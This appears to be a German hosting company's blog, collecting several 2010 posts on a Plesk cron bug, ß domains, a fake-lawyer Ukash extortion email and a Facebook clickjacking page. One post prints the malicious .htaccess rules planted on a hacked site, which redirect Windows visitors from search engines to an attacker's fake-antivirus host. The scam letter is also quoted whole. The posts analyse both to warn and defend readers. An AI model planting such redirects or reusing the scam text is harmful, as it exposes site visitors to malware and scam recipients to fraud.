Wer Plesk als Verwaltungssoftware fuer shared hosting Server benutzt, kennt ja das “leidige” Problem, dass nach einem Major-Update meistens irgend etwas gar nicht oder nicht richtig funktioniert, weswegen die meisten – wie man liest – ja mit dem Update auch immer mindestens auf die Minor-Version x.1 eines jeden Releases warten

Wir haben also auch mit dem Update bis zum Erscheinen der Plesk-Version 10.0.1 gewartet, welche aber auch noch den einen oder anderen kleineren Fehler mitbringt. So meldet der Cron Daemon taeglich einen fehlgeschlagenen Job, der die Regeln des mitgelieferten Spamassassins updaten soll:

/etc/cron.daily/60sa-update:
run-parts: failed to exec /etc/cron.daily/60sa-update: Exec format error
run-parts: /etc/cron.daily/60sa-update exited with return code 1

Der Fehler steckt in der ersten Zeile der Datei “60sa-update”:

#/bin/sh

Diese einfach aendern in

#!/bin/sh

das war’s schon

Neue Richtlinien ermöglichen Domainnamen mit ß -
Jetzt sichern als Zusatzdomain zu testdomain.de!

Mit Datum 26.10.2010 / 16.00 Uhr hat die Denic eine Erweiterung der bisherigen Domainnamen zugelassen. So ist es nun möglich, Domains mit dem “Latin Small Letter Sharp S” – auch als „Eszett“ oder „scharfes S“ („ß“) bekannt – zu registrieren.

Um die technischen Voraussetzungen zu schaffen, gibt es zunächst die sogenannte Sunrise-Phase. Drei Wochen lang können Domaininhaber ihre Domainwünsche äußern. Allerdings nur, sofern sie auch Besitzer der gleichlautenden Domain mit “ss” sind.

So besteht keine Eile, eine ähnlich turbulente Phase wie bei der Registrierung der zweistelligen Domains wird es nicht geben.

Für Fragen kontaktieren Sie uns bitte unter info@net-publics.de oder bestellen Sie Ihre Zusatzdomain unter http://www.net-publics.de/

Auch das gibt’s: Laut Hightech-Branchenverband BITKOM wissen fast die Hälfte der Handynutzer ihre eigene Nummer nicht auswendig. Gerade einmal 55 Prozent kennen auf Rückfrage die Nummer ihres Mobiltelefons. Noch schlechter sieht es bei der Handynummer des Partners aus: Nur 51 Prozent haben sie aus dem Gedächtnis parat. Ihre klassische Festnetznummer können dagegen fast alle aus dem Kopf nennen.

Laut BITKOM Bericht gibt es in dieser Sache Unterschiede zwischen Männern und Frauen. Frauen merken sich mit 70 Prozent die Nummern von Freunden eher als Männer (60 Prozent). Dafür behalten männliche Handynutzer die eigene Nummer etwas besser als weibliche (58 zu 50 Prozent).

Ach was…

Sicher kann man auch die Dauer der Gespräche zwischen zwei Freundinnen mit diesen Ergebnissen korrelieren, dann sieht man den Grund, warum Frauen sich merken die Nummern von Freunden besser merken als die eigene. Oder meinen die wirklich “Freunde” statt “Freundinnen”? Dann wird es noch brisanter.

Wie dem auch sei, warum macht man solche Studien?

Auch wenn es bereits sogar in den “Öffentlich Rechtlichen” erwähnt wurde, eventuell hilft dieser Eintrag ja der einen oder dem anderen…

Ich bin ja schon fast erfreut, daß mich auch mal wieder etwas Spam in meiner Inbox erreicht, so ganz ohne ist ja schon fast langweilig

Folgende Spammail erhielt ich an eine meiner Webmaster-Adressen:

Ermittlungsverfahren gegen Sie
Datum: Heute 19:24:03
Von: “Rechtsanwalt Florian Giese” <giese@ra-giese.info>
An: webmaster@xxxxxxxxxxxxx.zzz
Antwort an: yukonkfs4@rccmaine.com

Guten Tag,

in obiger Angelegenheit zeigen wir die anwaltliche Vertretung und Interessenwahrung der Firma Videorama GmbH,
Munchener Str. 63, 45145 Essen, an.

Gegenstand unserer Beauftragung ist eine von Ihrem Internetanschluss aus im sogenannten Peer-to-Peer-Netzwerk
begangene Urheberrechtsverletzung an Werken unseres Mandanten. Unser Mandant ist Inhaber der ausschliesslichen
Nutzungs- und Verwertungsrechte im Sinne der §§ 15ff UrhG bzw. § 31 UrhG an diesen Werken, bei denen es sich um
geschutzte Werke nach § 2 Abs 1 Nr. 1 UrhG handelt.

Durch das Herunterladen urherberrechtlich geschutzer Werke haben sie sich laut § 106 Abs 1 UrhG i.V. mit
§§ 15,17,19 Abs. 2 pp UrhG nachweislich strafbar gemacht.
Bei ihrem Internetanschluss sind mehrere Downloads von musikalischen Werken dokumentiert worden.

Aufgrund dieser Daten wurde bei der zustandigen Staatsanwaltschaft am Firmensitz unseres Mandanten Strafanzeige
gegen Sie gestellt.

Aktenzeichen: 230 Js 413/10 Sta Stuttgart

Ihre IP Adresse zum Tatzeitpunkt: 84.190.31.155

Illegal heruntergeladene musikalische Stucke (mp3): 13

Illegal hochgeladene musikalische Stucke (mp3): 21

Wie Sie vielleicht schon aus den Medien mitbekommen haben, werden heutzutage Urheberrechtverletzungen
erfolgreich vor Gerichten verteidigt, was in der Regel zu einer hohen Geldstrafe sowie Gerichtskosten fuhrt.
Link: Urheberrecht: Magdeburger muss 3000 Euro Schadensersatz zahlen

Genau aus diesem Grund unterbreitet unsere Kanzlei ihnen nun folgendes Angebot:
Um weiteren Ermittlungen der Staatsanwaltschaft und anderen offiziellen Unannehmlichkeiten wie Hausdurchsuchungen,
Gerichtsterminen aus dem Weg zu gehen, gestatten wir ihnen den Schadensersatzanspruch unseres Mandanten
aussergerichtlich zu loesen.
Wir bitten Sie deshalb den Schadensersatzanspruch von 100 Euro bis zum 22.10.2010 sicher und unkompliziert
mit einer UKASH-Karte zu bezahlen. Eine Ukash ist die sicherste Bezahlmethode im Internet und
fur Jedermann anonym an Tankstellen, Kiosken etc. zu erwerben.
Weitere Informationen zum Ukash-Verfahren erhalten Sie unter: http://www.ukash.com/de
Senden Sie uns den 19-stelligen Pin-Code der 100 Euro Ukash an folgende E-Mailadresse zahlung@ra-giese.info

* alternativ konnen Sie auch mit Paysafecard zahlen
Link: http://www.paysafecard.com/de

Geben Sie bei Ihre Zahlung bitte ihr Aktenzeichen an!

Sollten sie diesen Bezahlvorgang ablehnen bzw. wir bis zur angesetzten Frist keinen 19- stelligen
Ukash PIN-Code im Wert von 100 Euro erhalten haben(oder gleichwertiges Paysafecard Coupon), wird der Schadensersatzanspruch offiziell
aufrecht erhalten und das Ermittlungsverfahren mit allen Konsequenzen wird eingeleitet. Sie erhalten
dieses Schreiben daraufhin nochmals auf dem normalen Postweg.

Hochachtungsvoll,
Rechtsanwalt Florian Giese

Naja, da hat mein Spamfilter die Mail also schonmal 100-prozentig korrekt eingestuft, aber auch ohne die Klassifizierung sollte man sich wegen dieser Email keine Sorgen machen.

Beim ersten Überfliegen des Textes fiel mir zuerst schonmal auf, daß der “Herr Rechtsanwalt” zum einen offensichtlich nicht der deutschen Sprache mächtig ist, da er keine Umlaute verwendet, und zum anderen “Return-Path” und “Reply-To” mit “yukonkfs4@rccmaine.com” schonmal sehr verdächtig gefälscht sind. Von ein paar Rechtschreibfehlern mal abgesehen

Hinzu kommt dann noch das hier in DE natürlich für solche Vorgänge “vollkommen übliche” Zahlungsverfahren via Ukash (kenne ich gar nicht) oder Paysafe-Card (von der ich immerhin schon einmal gehört habe) und der Umstand, daß man nicht mich persönlich (mit Anrede) als Anschluss-Inhaber der angeblich identifizierten IP-Adresse, sondern einen von diesem DSL-Anschluss vollkommen unabhängigen Webmaster “irgendeiner” Domain anschreibt. Bei wem es hier noch nicht “klingelt”…

Schaut man sich dann die Header der Email an, erkennt man eine gefälsche “Received:” Zeile, die offensichtlich den Eindruck erwecken soll, die Email wäre zumindest von einem “offiziellen” Mailserver verschickt bzw. über diesen weitergeleitet worden:

Received: from 173.193.223.133 by inbound30.exchangedefender.com; Thu, 21 Oct 2010 12:24:03 -0500

Wirklich eingeliefert wurde die Mail aber mit gefälschtem HELO-Name der wiederum die wirkliche IP (die zudem keinen REV-PTR besitzt) des Absenders “verschleiern” soll:

Received: from 173.193.223.133-static.reverse.softlayer.com (unknown [186.112.222.25])

by srv01.xxxxxxxxxxxxx.zzz (Postfix) with ESMTP

for <webmaster@xxxxxxxxxxxxx.zzz>; Thu, 21 Oct 2010 19:24:05 +0200 (CEST)

Ein “whois 186.112.222.25″ ergibt dann, daß diese IP zu einem Provider aus Bogota, Kolumbien gehört. Soso, der Herr Anwalt arbeitet sogar im Urlaub

owner:       COLOMBIA TELECOMUNICACIONES S.A. ESP
ownerid:     CO-CTSE-LACNIC
responsible: Administradores Internet
address:     Transversal, 49, 105-84
address:     N – BOGOTA -
country:     CO

Dazu “passt” immerhin aber die wirkliche Angabe der Zeitzone (-5 Stunden rel. zu UTC) der Emailerstellung (die sich auch mit der gefälschten “Received” Zeile deckt):

Date: Thu, 21 Oct 2010 12:24:03 -0500

Ein “whois ra-giese.info” ergibt dann noch, daß der Inhaber der Domain per “privacyprotect.org” geschützt ist, die Nameserver unter einer russischen Domain liegen und die Domain erst vorgestern registriert wurde (ein Schnellstarter, unser Herr Anwalt )

Domain Name:RA-GIESE.INFO
Created On:19-Oct-2010 19:26:22 UTC
Last Updated On:19-Oct-2010 20:12:52 UTC
Expiration Date:19-Oct-2011 19:26:22 UTC

…

Registrant Name:Domain Admin
Registrant Organization:PrivacyProtect.org

…

Name Server:DNS1.NAUNET.RU
Name Server:DNS2.NAUNET.RU

Alles in allem ist diese Mail also nicht mal einen wirklichen Lacher wert, aber immerhin brachte sie ein wenig Abwechslung am späten Abend

Ich hoffe nur, daß nicht auch nur einer auf die Idee gekommen ist, sich “anner Tanke” so eine “Bezahlkarte” zu kaufen und einen Code an die genannte Adresse zu schicken…

Heute war dann der nächste aus meiner Freundesliste dran:

Es sollten mehr Leute unser Blog lesen denke ich -  siehe hier für alles Weitere – oder reicht es einfach, einen neuen Namen zu vergeben, um alle Leute mit der gleichen Masche nochmal reinzulegen?

Heute meldete sich ein Kunde mit einem interessanten Problem. Gibt man passende Suchbegriffe in die Suchmaschine ein, findet man seine Domain. Klickt man auf diese, landet man auf auf folgender Seite:

http://wwww.peoriavascularsurgeon.com/main.php?h=www.domain-des-kunden.de&i=J8mjjNocqP2kjhj7VspPypsXpA==&e=r

Diese Domain kann mittlerweile nicht mehr aufgelöst werden. Einer anderen Quelle im Internet zufolge, hätte dann versucht werden sollen, einen Virus zu installieren. Dies geschieht durch einen gefakten Windows-Desktop, bei dem allerhand Viren gefunden wurden. Um diese zu entfernen, müsse man nur noch einer Installation des Anti-Viren-Programmes zustimmen. Dieses ist natürlich in Wahrheit der eigentliche Schadcode – sie dazu auch hier. Überrascht wäre man sicherlich, wenn man Zahlen hätte, wie viele User diesem Trick tatsächlich auf den Leim gehen. Vor lauter Virenangst merkt da der ein oder andere bestimmt auch nicht, dass er auf einmal eine andere Zahl an Laufwerken hat oder sich plötzlich die Sprache von Windows verstellt hat – denn der präsentierte Screenshot mit den gefundenen “Gefahren” ist ja immer identisch.

Wer auch solche Probleme mit seiner eigenen Domain hat, sollte seine .htaccess genau checken – schaut man sich diese nur flüchtig in einer Shell an, ist diese nämlich leer. Die schadhaften Einträge sind erst einige Zeilen später zu finden. Hier im Detail:

ErrorDocument 500 http://wwww.peoriavascularsurgeon.com/main.php?i=J8mjjNocqP2kjhj7VspPypsXpA==&e=0
ErrorDocument 502 http://wwww.peoriavascularsurgeon.com/main.php?i=J8mjjNocqP2kjhj7VspPypsXpA==&e=2
ErrorDocument 403 http://wwww.peoriavascularsurgeon.com/main.php?i=J8mjjNocqP2kjhj7VspPypsXpA==&e=3

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*vkontakte.*$ [NC,OR]
[ ... ]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC]

RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://wwww.peoriavascularsurgeon.com/main.php?h=%{HTTP_HOST}&i=J8mjjNocqP2kjhj7VspPypsXpA==&e=r [R,L]

Ausgelassen habe ich die Liste der Seiten, die als Referer auftauchen müssen, damit der Effekt wirkt. Unter anderem: Ebay, Amazon, Google, Facebook, Twitter, etc..

So – und was lernen wir daraus?

• Wer im Internet unterwegs ist, braucht ein gesundes Misstrauen gegenüber allen unerwarteten Dingen.
• Wer im Internet unterwegs ist, braucht geeigneten Schutz, u.a. einen Virenscanner, einen sicheren Browser mit Tools zur Abwehr (ja, ich meine Firefox und NoScript)
• Wer im Internet unterwegs ist, …. (weitere schlaue Sprüche gerne als Kommentar )

• Wer Webspace hat, sucht sich eine sichere Software (CMS etc) aus.
• Weil es den vorigen Punkt nicht gibt, macht man zumindest alle wichtigen Sicherheitsupdate.
• Wer Webspace hat, ist auch im Internet unterwegs, also siehe oben.
• Wer Webspace hat, verwendet sichere Kennwörter! Unbedingt! Auch wenn es nicht so bequem ist! (das gilt eigentlich generell…)
• Wer Webspace hat, … (auch hier gerne Erweiterungen als Kommentar)

Zum Schluß:
Unser Kunde hatte die .htaccess per FTP untergeschoben bekommen, von einem Zugang aus Polen. Da es ein normaler Login war, gehen wir von einem sehr schwachen Kennwort aus.
Warum wir es zuerst nicht nachvollziehen konnten? Weil die Regeln nur für Windows gelten (siehe oben) und wir alle mit Linux ganz gut fahren..

Mal eine Anmerkung am Rande: ISP ist gemeinwohl als Abkürzung für Internet Service Provider bekannt. Sie werden auch als Internetdienstanbieter oder Internetdienstleister, im deutschsprachigen Raum auch oft nur als Provider, bezeichnet.

ISP hat aber sicher noch viele weitere Bedeutungen. Eine davon ist mir heute aufgefallen: Institut für Sexualpädagogik. Ah ja. Man muss also vorsichtig sein, wenn man einfach mal sagt: Ich arbeite bei einem ISP.

Heute fiel mir eine Meldung bei Facebook auf, die ich recht ungewöhnlich fand. Mehreren meiner Freunde “gefiel” der Link zu www.everonia.com mit oben genanntem Titel “The HOTTEST Girls on Facebook”. Aus reiner Neugier habe auch ich darauf geklickt. Erst einige Zeit und einen Kommentar auf meiner Pinnwand später bemerkte ich, dass auch ich nun diesen Link allen meinen Freunden empfohlen hatte.

Was war passiert?

Ich habe mir die Seite nochmals mit aktiven “No-Script”-Plugin angesehen. Dieses warnt vollkommen korrekt vor einem Clickjacking-Angriff, denn die Seite möchte sich nach dem ersten Vorschaubild direkt zu Facebook verbinden, und dort die Seite an die eigene Seite posten. Das Ganze geschieht natürlich, ohne das man das mitbekommt. Das ist wohl auch die Erklärung, dass mittlerweile weitere Freunde “Fan” dieser Seite ist.

Man kann den Eintrag von der eigenen Pinnwand entfernen – einfach mit der Maus drüberfahren und rechts erscheint der Link zum löschen. Wiedermal zeigt sich aber, wie sinnvoll das Firefox Addon “NoScript” ist. Und sicherheitshalber gilt nach dem Facebook-Besuch: Ausloggen nicht vergessen!